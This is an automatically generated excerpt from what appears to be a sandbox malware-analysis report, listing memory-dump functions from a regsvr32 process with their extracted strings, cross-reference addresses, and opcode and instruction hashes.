Opcode Fuzzy Hash: 6309be0400757c055c6b93c39c5d6cac011950fa6f0f95a2e23b8b5906f4d92f
Instruction Fuzzy Hash: A031F522B1CA554BF748B76C54662B573C1EBCA764F0406BEE18DD3283ED3CF8415A8A

Function 00007FFD34365C0D Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34365CBE
@3A4, xrefs: 00007FFD34365C88
@3A4, xrefs: 00007FFD34365CE6
@3A4, xrefs: 00007FFD34365D0A

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: f2b00b07fe54526c6a38ca7bcfaf62126f68da54f008eab5569b0a6a005171db
Instruction ID: 06d59b2b21a92fe00e0060299dbd4730fa44f95bf35a7d79656a24dcf92e9743
Opcode Fuzzy Hash: f2b00b07fe54526c6a38ca7bcfaf62126f68da54f008eab5569b0a6a005171db
Instruction Fuzzy Hash: D231C122B4CA874EE788FB1C94E61A977D1FF86224F08067AD18CD72C3DE2DA9414646

Function 00007FFD34554A68 Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34554AEE
@3A4, xrefs: 00007FFD34554AA0
(b#4, xrefs: 00007FFD34554B27
L, xrefs: 00007FFD34554B59

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: (b#4$@3A4$@3A4$L
API String ID: 0-3462152323
Opcode ID: 0e54efdc5e7bee0507ba11b6f2e29e2f9dd766a3376d112c6c4ba5442ad0c9f1
Instruction ID: 1d342b4d662900f52ddfdc43328a3bdf09e3a3d4c5f5c89fa52c48636d5dba4c
Opcode Fuzzy Hash: 0e54efdc5e7bee0507ba11b6f2e29e2f9dd766a3376d112c6c4ba5442ad0c9f1
Instruction Fuzzy Hash: 3031E432B1D9464FEB98FB1C94A26A4B3D1EB99320B0401B9D44EE7387DD2CF8058785

Function 00007FFD345572E1 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34557391
@3A4, xrefs: 00007FFD34557310
@3A4, xrefs: 00007FFD3455733E
@3A4, xrefs: 00007FFD34557366

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: dbce12ce6ced61cd4d0de2a84549ae79e66592ac3616c8590eebecd85819b0f6
Instruction ID: 252fae6180c4ff44d6a59ec07520c478135e6b1ba186bfaa704e89ab67bf12a6
Opcode Fuzzy Hash: dbce12ce6ced61cd4d0de2a84549ae79e66592ac3616c8590eebecd85819b0f6
Instruction Fuzzy Hash: 85210921F0DA8D4FEB99EB5888B55F8F7D1EB9A720F0402BAE00DD3282DD1CB8004746

Function 00007FFD3435F745 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34365CBE
@3A4, xrefs: 00007FFD34365C88
@3A4, xrefs: 00007FFD34365CE6
@3A4, xrefs: 00007FFD34365D0A

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: f9fb24cd525bcac53ea88e87299e201c524c3694db33fa0f8769fffc07952cc0
Instruction ID: 952e2ca42ccc97eb7a6cbadaf5609d9d2167599f603d9b3f3aebd3ac5d15c54b
Opcode Fuzzy Hash: f9fb24cd525bcac53ea88e87299e201c524c3694db33fa0f8769fffc07952cc0
Instruction Fuzzy Hash: 4C21AA6174C9874FEA88F71894E6279B2D1FF9A324F44067AE18DD32C2DE3D6441474B

Function 00007FFD34558C09 Relevance: 3.9, Strings: 3, Instructions: 161COMMON

Download Yara Rule

Strings

{U4, xrefs: 00007FFD34558CAE
@3A4, xrefs: 00007FFD34558C8C
@3A4, xrefs: 00007FFD34558C45

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: {U4$@3A4$@3A4
API String ID: 0-3537246270
Opcode ID: 28e9574910b0423bce7bee73e153643d6f3868fc10be679a521f46c52e6f2e1a
Instruction ID: 2bc2bbade699d8459325d233b0d84a2cf9ef5dbb54e0de60143503494a09f9ba
Opcode Fuzzy Hash: 28e9574910b0423bce7bee73e153643d6f3868fc10be679a521f46c52e6f2e1a
Instruction Fuzzy Hash: 5A41E621F0DA4D5FD396E72888A66B5B7E1FF9A210B0401FAD04EC7293DE1CA8459741

Function 00007FFD34520470 Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

xkF4, xrefs: 00007FFD34520515
xkF4, xrefs: 00007FFD34520477
xkF4, xrefs: 00007FFD345204DD

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: xkF4$xkF4$xkF4
API String ID: 0-3355040245
Opcode ID: 84c623c39464d951247267ed60dfc8f8814797fc5e511fd0a19ea55267e6624f
Instruction ID: 3ada31247e974445eae9761b15defefcec3fa6be29715200a73b1461fd7412a9
Opcode Fuzzy Hash: 84c623c39464d951247267ed60dfc8f8814797fc5e511fd0a19ea55267e6624f
Instruction Fuzzy Hash: A141C122B1DD4A0FE6D6EB2C44B423DA6C2FFDA654B54417AD24DD3296DE2CE8029341

Function 00007FFD34523D94 Relevance: 3.9, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

p.F4, xrefs: 00007FFD34523D9B
p.F4, xrefs: 00007FFD34523E2D
p.F4, xrefs: 00007FFD34523DEE

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: p.F4$p.F4$p.F4
API String ID: 0-1027796014
Opcode ID: bae005a9ec637945a4d1964197069311d86e820fe148ce4332a5f12d0e125320
Instruction ID: a1fc0b67f1b0cbf31905a68592a3a4794ef457f3d9354c5bd21a864baec887e3
Opcode Fuzzy Hash: bae005a9ec637945a4d1964197069311d86e820fe148ce4332a5f12d0e125320
Instruction Fuzzy Hash: 3E41A262B1DE8A1FE7D6EB2C44A527967C2FFEA244B54407BD14DC3286DD2CF8029341

Function 00007FFD3435F6A5 Relevance: 3.9, Strings: 3, Instructions: 130COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3437B1CA
@3A4, xrefs: 00007FFD3437B22F
@3A4, xrefs: 00007FFD3437B207

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4
API String ID: 0-3063612242
Opcode ID: 15c8b0980f56adbbae308e09fc6928d867ad67d2161e3e0e21eb7c0f82649ef3
Instruction ID: 5f7c4fec7d40b39d19995c211c6bef36690b63a8ddaa3f4f6ca597bbb84a63b2
Opcode Fuzzy Hash: 15c8b0980f56adbbae308e09fc6928d867ad67d2161e3e0e21eb7c0f82649ef3
Instruction Fuzzy Hash: 0F418235B4894E8FEB88FF18C8A16A9BBA0FF59314F0045B9E15DC72D2DE79A841C744

Function 00007FFD34365A7D Relevance: 3.9, Strings: 3, Instructions: 115COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34384EDD
=74, xrefs: 00007FFD34384E5E
@3A4, xrefs: 00007FFD34384F20

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: =74$@3A4$@3A4
API String ID: 0-198681823
Opcode ID: ae0c8a619b6ce83a1413700e087c3ef2d0cfb3198ea1705d9329e0795601e63c
Instruction ID: 7ffb1ca761b2637873a4523954aff48f1a5c99044b67675f3f650c4e09dd2fd4
Opcode Fuzzy Hash: ae0c8a619b6ce83a1413700e087c3ef2d0cfb3198ea1705d9329e0795601e63c
Instruction Fuzzy Hash: 2731F82172DA854FD759F76898A16A5B7E0EBA6310F4402BBD04DC32D3DD6DB8058382

Function 00007FFD3435DAC1 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435DB2F
@3A4, xrefs: 00007FFD3435DAE7
@3A4, xrefs: 00007FFD3435DB74

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4
API String ID: 0-3063612242
Opcode ID: 51ad4e2dec7533de348d20021e879ac3e1e5fcee0e8d7c4df68c56c984e5dc6d
Instruction ID: e57b46116edb6ffdaaa327b0ec590432e18c5f2cd91f497e7c7c259251af945f
Opcode Fuzzy Hash: 51ad4e2dec7533de348d20021e879ac3e1e5fcee0e8d7c4df68c56c984e5dc6d
Instruction Fuzzy Hash: 9931F722B1DE990BE398A75C68A9175BBC1EBDA624B0403FFE44CD3293DD2D7C414286

Function 00007FFD3435F71D Relevance: 3.9, Strings: 3, Instructions: 109COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3437B1CA
@3A4, xrefs: 00007FFD3437B22F
@3A4, xrefs: 00007FFD3437B207

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4
API String ID: 0-3063612242
Opcode ID: 63ed712fc018cef0fca4b09e0d5a4e51245c08bc7e95b3aa4485c649e20713f6
Instruction ID: 5a2343907a102750de814c368c96183d852b472857b0e60915c17f4c9a47a751
Opcode Fuzzy Hash: 63ed712fc018cef0fca4b09e0d5a4e51245c08bc7e95b3aa4485c649e20713f6
Instruction Fuzzy Hash: 9E316F30B48A4E8FEB88FF18C8A17A9B7A1FF99304F004579E55DD32C6DE79A8018744

Function 00007FFD34556405 Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34556493
@3A4, xrefs: 00007FFD345564BA
@3A4, xrefs: 00007FFD3455646F

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4
API String ID: 0-3063612242
Opcode ID: 0c9ec099cfcd325d64b953a987a9b35cc3c9c8c8b723a2760e47a3774f14ba82
Instruction ID: dbbce51eb89c1de817418631613d311d69f627d98359379a7f5c837dc3f04812
Opcode Fuzzy Hash: 0c9ec099cfcd325d64b953a987a9b35cc3c9c8c8b723a2760e47a3774f14ba82
Instruction Fuzzy Hash: 9621F621E0E6C94FD7A6EB7444B62B5BBD0EF57320B4405FAD04DC72A3DD2CA8448346

Function 00007FFD3435CFB0 Relevance: 3.8, Strings: 3, Instructions: 78COMMON

Download Yara Rule

Strings

3Q4, xrefs: 00007FFD343A3A31
@3A4, xrefs: 00007FFD343A39D5
@3A4, xrefs: 00007FFD343A3990

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$3Q4
API String ID: 0-2280264602
Opcode ID: 333439495fb425b6b8a6b41371a28fd88a4cc7f0e24a948e9480bb5d2aa7043f
Instruction ID: 983e5ca7f531ea0d6c6cb047dda66c4a045a7836771ef160813b9fb681ae7b19
Opcode Fuzzy Hash: 333439495fb425b6b8a6b41371a28fd88a4cc7f0e24a948e9480bb5d2aa7043f
Instruction Fuzzy Hash: DD210721B5DB894FE7D5F73844AA2B9BBD0EF56314F0405BFE948D3192ED2CA4808342

Function 00007FFD3435D207 Relevance: 3.8, Strings: 3, Instructions: 68COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435D20F
@3A4, xrefs: 00007FFD3435D23B
@3A4, xrefs: 00007FFD3435D276

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4
API String ID: 0-3063612242
Opcode ID: 963441769db611d1c0987424b7e2a51c1e38161f9fcb5d5b83abf7d2e5c8908e
Instruction ID: cf53822864cf259e3247494f266c5f64562f6a494f65a5e84baa9a3fea243ee8
Opcode Fuzzy Hash: 963441769db611d1c0987424b7e2a51c1e38161f9fcb5d5b83abf7d2e5c8908e
Instruction Fuzzy Hash: 43118431B1CA498FEB58FB5898A25A8B7E0FF89610F4401BAE44DD3286DE3CB8404781

Function 00007FFD3455599A Relevance: 3.8, Strings: 3, Instructions: 46COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD345559D6
@3A4, xrefs: 00007FFD345559AF
@3A4, xrefs: 00007FFD345559FB

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4
API String ID: 0-3063612242
Opcode ID: febc163a550fddf035328f314473f63512b5e781af5517f908e2d886d934f0dd
Instruction ID: 93bdab51766e1a91ddc80dd480a734a4755e547edeb52c57adaa63a6ecb920c7
Opcode Fuzzy Hash: febc163a550fddf035328f314473f63512b5e781af5517f908e2d886d934f0dd
Instruction Fuzzy Hash: 7B01C475F0D94D4AEB49EF64C0B55F8BAA1FF96310F1003BAE40ED3296DD2DB8418681

Function 00007FFD3435B4A0 Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD3437AD09
`K4, xrefs: 00007FFD3437AD37

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: `K4$d
API String ID: 0-667312335
Opcode ID: f248fc994834eb723c598a9c953a6178f8d049fb47206e7cbb845ef6706915b6
Instruction ID: 643d275fea20b7e3731b5b2c5650d9623d62ad6e63c76344e5413638df8aa914
Opcode Fuzzy Hash: f248fc994834eb723c598a9c953a6178f8d049fb47206e7cbb845ef6706915b6
Instruction Fuzzy Hash: 08E12430B18A098FDB58EF18C8A157577E1FF9A310B1485B9D58AC7296DE39E842CB80

Function 00007FFD343670E5 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34367209
@3A4, xrefs: 00007FFD34367892

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: c6a5cf17ffc62a0a6126df4d5076b28220d52b91d8fe5b9fd77a1b8452991aa8
Instruction ID: b85d7109058449d7c953a6afe9cacd5463838c1c59f32043b5fc573966a6f725
Opcode Fuzzy Hash: c6a5cf17ffc62a0a6126df4d5076b28220d52b91d8fe5b9fd77a1b8452991aa8
Instruction Fuzzy Hash: 6E619030A1864A8FDB94FB58C8E2AA477E2FF99314F404179C50ED7296DE3DAC41DB41

Function 00007FFD3436197C Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

;, xrefs: 00007FFD343619CF
@3A4, xrefs: 00007FFD343619B1

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$;
API String ID: 0-2984178292
Opcode ID: d28d037ce6c82c851a2064c46e0784f69cb95a9dd44515746f683fa30eaf2e3a
Instruction ID: a1b614ccbf3f00ab9ff1617a7cdc45400d81fd8b33f8905e3556fc1a4f7d329b
Opcode Fuzzy Hash: d28d037ce6c82c851a2064c46e0784f69cb95a9dd44515746f683fa30eaf2e3a
Instruction Fuzzy Hash: 2C411431B5DA490FE799FB2884F62F577D2EF9A22070402FAD54EC3293DD2D68429781

Function 00007FFD3436CCD1 Relevance: 2.7, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3436CD7A
@3A4, xrefs: 00007FFD3436CDBA

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: 43b0b894a716e5a33a0cffa8d8f8a765daf25f03117ea6f6b54bad95a31508f5
Instruction ID: 8e283c04ede98e5550eb0aee196eddd6a2bcef3a1981cf49dc3c0f041e0aee75
Opcode Fuzzy Hash: 43b0b894a716e5a33a0cffa8d8f8a765daf25f03117ea6f6b54bad95a31508f5
Instruction Fuzzy Hash: 0341BA31A4C68A4FEB54BB1C84966B57BE1FF96320F14017AE589C3292DE3CB8429745

Function 00007FFD3435F755 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3436CD7A
@3A4, xrefs: 00007FFD3436CDBA

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: 11a278c3eb3bc299df3ec348e85d0c744ed225e211c613ebb3799d10981b9507
Instruction ID: 77aa345de95eb6eb99f2eca140510bfe7459474a3c23c3e7f08381d5af4b48c9
Opcode Fuzzy Hash: 11a278c3eb3bc299df3ec348e85d0c744ed225e211c613ebb3799d10981b9507
Instruction Fuzzy Hash: C841C83171C68A4FEB58FA1C84966B97BD1FB96320F14013EE58DC3292DE3CB8429745

Function 00007FFD345213A0 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

(MF4, xrefs: 00007FFD34521455
(MF4, xrefs: 00007FFD3452140B

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: (MF4$(MF4
API String ID: 0-2073750113
Opcode ID: ce3a8a6eb67072be78bc8f18badcc58edec22c42acea62a90635d2fa8b8b7e33
Instruction ID: 736a9ba71d25fca2e5caa1df8ccc2d18e07264fac16106742379d7d0a84a8d02
Opcode Fuzzy Hash: ce3a8a6eb67072be78bc8f18badcc58edec22c42acea62a90635d2fa8b8b7e33
Instruction Fuzzy Hash: DB41C361B1CE8A0FE792EB2C54A567967D2FFD9304B5500BED58DC3293ED2CE9029341

Function 00007FFD34522560 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

HzF4, xrefs: 00007FFD34522615
HzF4, xrefs: 00007FFD345225CB

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: HzF4$HzF4
API String ID: 0-3002283447
Opcode ID: aac01162e100ef4ac45b2bcc4f0077c1b7a315d5c4f6ab1b39d3538643278d1c
Instruction ID: 891605bd738d7cc113edf1e3908b50a663669da3435be87ed123bcda2b7a0a48
Opcode Fuzzy Hash: aac01162e100ef4ac45b2bcc4f0077c1b7a315d5c4f6ab1b39d3538643278d1c
Instruction Fuzzy Hash: 1E419261B1CA8A0FE796E72C44B46797BD1FF9A200F1944BED18DC72A6DD2CE902D341

Function 00007FFD34521B64 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

AF4, xrefs: 00007FFD34521BCF
AF4, xrefs: 00007FFD34521C19

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: AF4$AF4
API String ID: 0-2653918432
Opcode ID: 675000c0f621a6a19dfe980665938425e992b262f53e34132ade0b55729dc449
Instruction ID: 3323d9fd99a84cf5549f159b9697df62d79ee9645e9f88e9f59aa521830055db
Opcode Fuzzy Hash: 675000c0f621a6a19dfe980665938425e992b262f53e34132ade0b55729dc449
Instruction Fuzzy Hash: 0E41B121B1CA4A4FE796EB2C94A567977D1FF9A200F5904BAD18DC7292DE3CF901D301

Function 00007FFD34521FDB Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

~F4, xrefs: 00007FFD34522089
~F4, xrefs: 00007FFD3452203F

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: ~F4$~F4
API String ID: 0-685830136
Opcode ID: 4daf0cb82fd8d1ae352b79a27af0bd24226df3ca390093ca65ef17246785fb0c
Instruction ID: f2385d59a8d93df6977348608e4d7a9798922feaf876dad1ec5a3c11ff520a02
Opcode Fuzzy Hash: 4daf0cb82fd8d1ae352b79a27af0bd24226df3ca390093ca65ef17246785fb0c
Instruction Fuzzy Hash: 6B41C461B1CA8A4FE796EB1C84A463977D1FF9A200B1944BEE14DC72A2DE2CF901D301

Function 00007FFD34521817 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

@HF4, xrefs: 00007FFD3452187B
@HF4, xrefs: 00007FFD345218C5

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: @HF4$@HF4
API String ID: 0-748214974
Opcode ID: 660460397db42c8da8727872e5f6f86799697216074eb43f87b98adeaa105fd4
Instruction ID: b23303575ecd6414a570245ece6deb8fac960183a4324e11863629bfe658ee40
Opcode Fuzzy Hash: 660460397db42c8da8727872e5f6f86799697216074eb43f87b98adeaa105fd4
Instruction Fuzzy Hash: E541B221B1CA8A4FE796EB1C84E563977D1FF9A200B1904BAD14DC7292DE2CF901D341

Function 00007FFD34521005 Relevance: 2.6, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

hUF4, xrefs: 00007FFD3452108F
hUF4, xrefs: 00007FFD34521057

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID: hUF4$hUF4
API String ID: 0-2205640973
Opcode ID: c41cc52848c0f95cfc936aadb64be297c77134751da07003265337a914ab0b36
Instruction ID: f6c730f1a02c84413f6c4f341597259c217756478d400a0579e5439659ce4c35
Opcode Fuzzy Hash: c41cc52848c0f95cfc936aadb64be297c77134751da07003265337a914ab0b36
Instruction Fuzzy Hash: 4841BE21B1CD4A0FE7D6EB2C44A463AA6C2FFDA240B58447AE14DD3396DE3CE8029341

Function 00007FFD3455BEA5 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3455BF74
@3A4, xrefs: 00007FFD3455BF0D

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: bb69c93237c2f7568f76aa7f9701e1ebc29008025e04bd414257a66b8e6b9690
Instruction ID: 2e9c89314a48233d0b7014582ce3b88b533231453d6fb758cd186ac88ece7013
Opcode Fuzzy Hash: bb69c93237c2f7568f76aa7f9701e1ebc29008025e04bd414257a66b8e6b9690
Instruction Fuzzy Hash: 8D31FB71F1DA894FE786EB6884A61B8B7E1FF96310F0441FEC14AC3292DE2CE8058741

Function 00007FFD3435A755 Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435A7EF
@3A4, xrefs: 00007FFD3435A7BC

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: a34446cda4b5d5fd968316b4dc0266965d3cda5944f28fecacd1ba01527d2d16
Instruction ID: b0ee4a1358999640ff9595e229e0f8a6721261f07f773a64caab7fba72cfbf4b
Opcode Fuzzy Hash: a34446cda4b5d5fd968316b4dc0266965d3cda5944f28fecacd1ba01527d2d16
Instruction Fuzzy Hash: D131E772B0994E0BEB94FBAC94A61EDB7E0FF96314B0401B6D10CD3282DD3D78465781

Function 00007FFD3435D125 Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435D1CC
@3A4, xrefs: 00007FFD3435D197

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
Opcode ID: 9324702d8f80f2e7bf14f48b3e1176ca86da6b8a5c09ff95963ba198a9445534
Instruction ID: 3395669f8a51a3e03ce991ebbcc77d2fd0dda271954cdf55b176f6c1224782d3
Opcode Fuzzy Hash: 9324702d8f80f2e7bf14f48b3e1176ca86da6b8a5c09ff95963ba198a9445534
Instruction Fuzzy Hash: 4E213C31A0C6994FD759FF6C88655A97BE0FF99220705027FD448D72D3DE286806C781

Function 00007FFD343524C9 Relevance: 2.6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34352586
@3A4, xrefs: 00007FFD34352519

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4
API String ID: 0-266369152
